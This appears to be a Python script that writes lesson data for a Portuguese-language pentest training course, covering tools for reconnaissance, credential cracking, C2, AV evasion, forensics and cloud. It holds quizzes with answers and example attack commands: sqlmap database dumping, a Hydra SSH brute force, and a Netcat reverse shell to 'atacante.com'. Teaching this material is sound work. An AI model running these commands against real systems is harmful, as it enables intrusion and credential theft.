import json
P='/home/gabriel/Downloads/64Gram Desktop/CyberDuo/scripts/lesson_definitions.json'
with open(P,'r') as f: L=json.load(f)

# Remove old 10.2, replace with 10.2a/b/c/d
L = [l for l in L if l['filename'] != '10.2-ferramentas-analise.html']

L.extend([
{"filename":"10.2a-recon-enum-tools.html","module":"10","title":"Ferramentas de Recon e Enumeração 10.2a","victory_msg":"FERRAMENTAS DE RECON DOMINADAS!","steps":[
{"type":"teach","icon":"fa-binoculars","title":"10.2.1 Visão Geral","content":"As ferramentas de pentest são organizadas por <b>fase do ataque</b>: reconhecimento, varredura, exploração, pós-exploração, evasão, forense e relatório.","highlight":"Cada fase tem suas ferramentas especializadas"},
{"type":"teach","icon":"fa-linux","title":"10.2.2 Distribuições Linux","content":"<b>Kali Linux</b>: a distro mais popular, 600+ ferramentas. <b>Parrot OS</b>: alternativa leve com foco em privacidade. <b>BlackArch</b>: rolling release com 2800+ ferramentas.","highlight":"Kali = padrão, Parrot = leve, BlackArch = completo"},
{"type":"match","title":"Distro → Característica","pairs":[{"term":"Kali Linux","definition":"600+ ferramentas, padrão da indústria"},{"term":"Parrot OS","definition":"Leve, foco em privacidade"},{"term":"BlackArch","definition":"2800+ ferramentas, rolling release"}]},
{"type":"teach","icon":"fa-magnifying-glass","title":"10.2.3 Ferramentas de Reconhecimento","content":"<b>Nmap</b>: scanner de rede. <b>Recon-ng</b>: framework OSINT modular. <b>theHarvester</b>: e-mails e subdomínios. <b>Maltego</b>: visualização de relações. <b>Shodan</b>: busca de dispositivos. <b>Censys</b>: certificados TLS.","highlight":"Cada ferramenta cobre um aspecto do recon"},
{"type":"teach","icon":"fa-folder-tree","title":"Enumeração com Enum4linux","content":"<b>Enum4linux</b> enumera informações de hosts Windows/Samba: <b>shares</b>, <b>usuários</b>, <b>grupos</b>, <b>políticas de senha</b> e <b>SIDs</b>. Usa protocolos SMB e RPC.","highlight":"Enum4linux = raio-X de servidores Windows/Samba"},
{"type":"example","icon":"fa-terminal","title":"Enum4linux em Ação","scenario":"O pentester roda enum4linux contra um servidor Windows e descobre shares abertos, lista de usuários e política de senhas fraca.","code":"enum4linux -a 192.168.1.100","takeaway":"-a = modo agressivo, enumera tudo que conseguir."},
{"type":"teach","icon":"fa-sitemap","title":"DNSRecon e Subfinder","content":"<b>DNSRecon</b>: enumeração DNS completa (zone transfer, brute force de subdomínios). <b>Subfinder</b>: descoberta passiva de subdomínios via APIs públicas.","highlight":"Subdomínios esquecidos são portas de entrada"},
{"type":"quiz","task":"Qual ferramenta enumera shares, usuários e grupos de servidores Windows via SMB?","options":["Enum4linux","Nmap","Wireshark"],"correctText":"Enum4linux","explanation":"Enum4linux usa SMB/RPC para extrair informações detalhadas de hosts Windows."},
{"type":"fill","sentence":"A ferramenta ___ descobre subdomínios passivamente usando APIs de fontes públicas.","options":["Subfinder","Nmap","Metasploit"],"correctText":"Subfinder","explanation":"Subfinder consulta fontes como VirusTotal, Shodan e Censys para encontrar subdomínios."}
]},
{"filename":"10.2b-vuln-cred-tools.html","module":"10","title":"Ferramentas de Vuln e Credencial 10.2b","victory_msg":"FERRAMENTAS DE ATAQUE DOMINADAS!","steps":[
{"type":"teach","icon":"fa-bug","title":"10.2.5 Ferramentas de Varredura de Vuln","content":"<b>Nessus</b>: scanner comercial líder. <b>OpenVAS</b>: alternativa open source. <b>Nikto</b>: scanner web específico. <b>WPScan</b>: scanner para WordPress. <b>SQLMap</b>: automação de SQL Injection.","highlight":"Cada scanner é especializado em um domínio"},
{"type":"match","title":"Scanner → Alvo","pairs":[{"term":"Nessus","definition":"Varredura geral de vulnerabilidades"},{"term":"Nikto","definition":"Servidores web"},{"term":"WPScan","definition":"Sites WordPress"},{"term":"SQLMap","definition":"SQL Injection automatizado"}]},
{"type":"example","icon":"fa-terminal","title":"SQLMap Automatizado","scenario":"O pentester encontra um parâmetro vulnerável a SQLi e usa SQLMap para automatizar a extração do banco de dados completo.","code":"sqlmap -u 'http://alvo.com/page?id=1' --dbs --batch","takeaway":"SQLMap automatiza toda a cadeia de exploração SQLi."},
{"type":"teach","icon":"fa-key","title":"10.2.7 Ferramentas de Ataque de Credencial","content":"<b>Hydra</b>: brute force online (SSH, FTP, HTTP). <b>John the Ripper</b>: cracking offline de hashes. <b>Hashcat</b>: cracking com GPU. <b>Medusa</b>: brute force paralelo. <b>CeWL</b>: gera wordlists a partir de sites.","highlight":"Online = Hydra. Offline = Hashcat/John."},
{"type":"example","icon":"fa-terminal","title":"Hydra Brute Force SSH","scenario":"O pentester usa Hydra com uma wordlist para testar senhas SSH contra um servidor alvo.","code":"hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100","takeaway":"Hydra testa milhares de senhas por minuto contra serviços de rede."},
{"type":"teach","icon":"fa-microchip","title":"Hashcat com GPU","content":"<b>Hashcat</b> usa a GPU para cracking massivamente paralelo. Suporta 300+ tipos de hash (MD5, SHA, NTLM, bcrypt). <b>Modo 0</b>: dicionário. <b>Modo 3</b>: brute force. <b>Modo 6</b>: híbrido.","highlight":"GPU cracka milhões de hashes por segundo"},
{"type":"quiz","task":"Qual ferramenta usa a GPU para cracking massivamente paralelo de hashes?","options":["Hashcat","Hydra","Nmap"],"correctText":"Hashcat","explanation":"Hashcat aproveita o poder paralelo da GPU para testar bilhões de combinações."},
{"type":"fill","sentence":"A ferramenta ___ gera wordlists customizadas a partir do conteúdo de um website.","options":["CeWL","Hydra","Nmap"],"correctText":"CeWL","explanation":"CeWL (Custom Word List) spider o site e extrai palavras para criar dicionários personalizados."},
{"type":"match","title":"Ferramenta → Tipo de Ataque","pairs":[{"term":"Hydra","definition":"Brute force online (rede)"},{"term":"John the Ripper","definition":"Cracking offline (CPU)"},{"term":"Hashcat","definition":"Cracking offline (GPU)"},{"term":"CeWL","definition":"Geração de wordlist"}]}
]},
{"filename":"10.2c-persist-evasion-tools.html","module":"10","title":"Ferramentas de Persistência e Evasão 10.2c","victory_msg":"EVASÃO E PERSISTÊNCIA DOMINADAS!","steps":[
{"type":"teach","icon":"fa-anchor","title":"10.2.9 Ferramentas de Persistência","content":"<b>Netcat</b>: 'canivete suíço' de rede (bind/reverse shells). <b>Ncat</b>: versão melhorada com SSL. <b>PowerShell Empire</b>: C2 framework. <b>Covenant</b>: C2 .NET. <b>Cobalt Strike</b>: C2 comercial premium.","highlight":"C2 = Command and Control — controle pós-exploração"},
{"type":"teach","icon":"fa-tower-broadcast","title":"C2 Frameworks","content":"<b>C2 (Command & Control)</b> são frameworks que gerenciam múltiplos acessos comprometidos. Permitem <b>executar comandos</b>, <b>mover lateralmente</b>, <b>exfiltrar dados</b> e <b>pivotar</b> pela rede.","highlight":"C2 = painel de controle do atacante"},
{"type":"example","icon":"fa-terminal","title":"Reverse Shell com Netcat","scenario":"O atacante configura um listener Netcat e o alvo conecta de volta, estabelecendo uma shell reversa.","code":"# Atacante (listener):\nnc -lvnp 4444\n\n# Alvo (conexão reversa):\nnc -e /bin/bash atacante.com 4444","takeaway":"Reverse shells contornam firewalls que bloqueiam conexões de entrada."},
{"type":"quiz","task":"Qual é a principal vantagem de uma reverse shell sobre uma bind shell?","options":["Contorna firewalls que bloqueiam conexões de entrada","É mais rápida","Não precisa de rede"],"correctText":"Contorna firewalls que bloqueiam conexões de entrada","explanation":"Na reverse shell, o alvo inicia a conexão para fora, passando pelo firewall."},
{"type":"teach","icon":"fa-eye-slash","title":"10.2.11 Ferramentas de Evasão","content":"<b>Veil</b>: gera payloads que evadem antivírus. <b>Shellter</b>: injeta shellcode em executáveis legítimos. <b>Msfvenom</b>: gera payloads com encoding. <b>ProxyChains</b>: roteia tráfego por proxies.","highlight":"Evasão = tornar o payload invisível ao AV"},
{"type":"match","title":"Ferramenta → Função de Evasão","pairs":[{"term":"Veil","definition":"Gera payloads anti-antivírus"},{"term":"Shellter","definition":"Injeta shellcode em .exe legítimos"},{"term":"ProxyChains","definition":"Roteia tráfego por proxies"},{"term":"Msfvenom","definition":"Gera e encoda payloads"}]},
{"type":"teach","icon":"fa-shield-halved","title":"10.2.13 Frameworks de Exploração","content":"<b>Metasploit Framework</b>: o maior framework (2000+ exploits). <b>BeEF</b>: exploração de browsers. <b>RouterSploit</b>: exploração de roteadores e IoT. <b>Exploit Pack</b>: GUI para exploração.","highlight":"Metasploit = o arsenal mais completo do pentester"},
{"type":"fill","sentence":"O framework que injeta shellcode em executáveis Windows legítimos para evadir antivírus é o ___.","options":["Shellter","Nmap","Burp Suite"],"correctText":"Shellter","explanation":"Shellter modifica executáveis PE para incluir shellcode sem alterar sua funcionalidade aparente."}
]},
{"filename":"10.2d-forense-special-tools.html","module":"10","title":"Ferramentas Forenses e Especiais 10.2d","victory_msg":"TOOLKIT COMPLETO DOMINADO!","steps":[
{"type":"teach","icon":"fa-microscope","title":"10.2.15 Descompilação e Debugging","content":"<b>Ghidra</b>: descompilador da NSA (gratuito). <b>IDA Pro</b>: disassembler comercial líder. <b>OllyDbg</b>: debugger Windows. <b>GDB</b>: debugger Linux. <b>Radare2</b>: framework de engenharia reversa.","highlight":"Engenharia reversa revela o que o código realmente faz"},
{"type":"match","title":"Ferramenta → Uso","pairs":[{"term":"Ghidra","definition":"Descompilador gratuito (NSA)"},{"term":"IDA Pro","definition":"Disassembler comercial líder"},{"term":"GDB","definition":"Debugger Linux"},{"term":"Radare2","definition":"Framework de eng. reversa"}]},
{"type":"teach","icon":"fa-hard-drive","title":"10.2.17 Ferramentas Forenses","content":"<b>Autopsy</b>: análise forense de discos. <b>Volatility</b>: análise de memória RAM. <b>FTK Imager</b>: criação de imagens forenses. <b>Sleuth Kit</b>: análise de sistemas de arquivo.","highlight":"Forense digital = reconstruir o que aconteceu"},
{"type":"quiz","task":"Qual ferramenta analisa dumps de memória RAM para encontrar processos maliciosos?","options":["Volatility","Autopsy","Nmap"],"correctText":"Volatility","explanation":"Volatility extrai processos, conexões, chaves de registro e malware da memória."},
{"type":"teach","icon":"fa-check-double","title":"10.2.19 Garantia de Software","content":"<b>SonarQube</b>: análise estática de código. <b>Fortify</b>: SAST comercial. <b>OWASP ZAP</b>: DAST gratuito. <b>Bandit</b>: análise de segurança Python. <b>Semgrep</b>: análise estática moderna.","highlight":"SAST = código. DAST = app rodando."},
{"type":"teach","icon":"fa-wifi","title":"10.2.21 Ferramentas Wireless","content":"<b>Aircrack-ng</b>: suite completa WiFi. <b>Kismet</b>: detector de redes wireless. <b>Wifite</b>: automação de ataques WiFi. <b>Fern WiFi Cracker</b>: GUI para ataques wireless.","highlight":"Aircrack-ng = suite padrão para hacking WiFi"},
{"type":"teach","icon":"fa-image","title":"10.2.23 Esteganografia","content":"<b>Steghide</b>: esconde dados em imagens JPEG. <b>OpenStego</b>: esteganografia multiplataforma. <b>Stegsolve</b>: análise visual de esteganografia. <b>Binwalk</b>: extrai dados embutidos em arquivos.","highlight":"Esteganografia = esconder dados em arquivos inocentes"},
{"type":"teach","icon":"fa-cloud","title":"10.2.25 Ferramentas de Nuvem","content":"<b>ScoutSuite</b>: auditoria multi-cloud (AWS/Azure/GCP). <b>Prowler</b>: segurança AWS. <b>CloudSploit</b>: scanner de misconfiguration. <b>Pacu</b>: framework de exploração AWS.","highlight":"Cada provedor cloud tem ferramentas específicas"},
{"type":"match","title":"Ferramenta Cloud → Uso","pairs":[{"term":"ScoutSuite","definition":"Auditoria multi-cloud"},{"term":"Prowler","definition":"Segurança AWS"},{"term":"Pacu","definition":"Exploração AWS"},{"term":"CloudSploit","definition":"Scanner de misconfiguration"}]},
{"type":"fill","sentence":"A ferramenta gratuita de descompilação criada pela NSA é o ___.","options":["Ghidra","IDA Pro","OllyDbg"],"correctText":"Ghidra","explanation":"Ghidra foi liberado pela NSA como open source em 2019 e rivaliza com o IDA Pro."},
{"type":"quiz","task":"Qual ferramenta esconde dados dentro de imagens JPEG?","options":["Steghide","Wireshark","Nmap"],"correctText":"Steghide","explanation":"Steghide embute dados em imagens JPEG e áudio AU sem alteração visual perceptível."}
]}
])

with open(P,'w') as f: json.dump(L,f,ensure_ascii=False,indent=2)
print(f"✅ {len(L)} lessons (expanded 10.2 → 10.2a/b/c/d)")
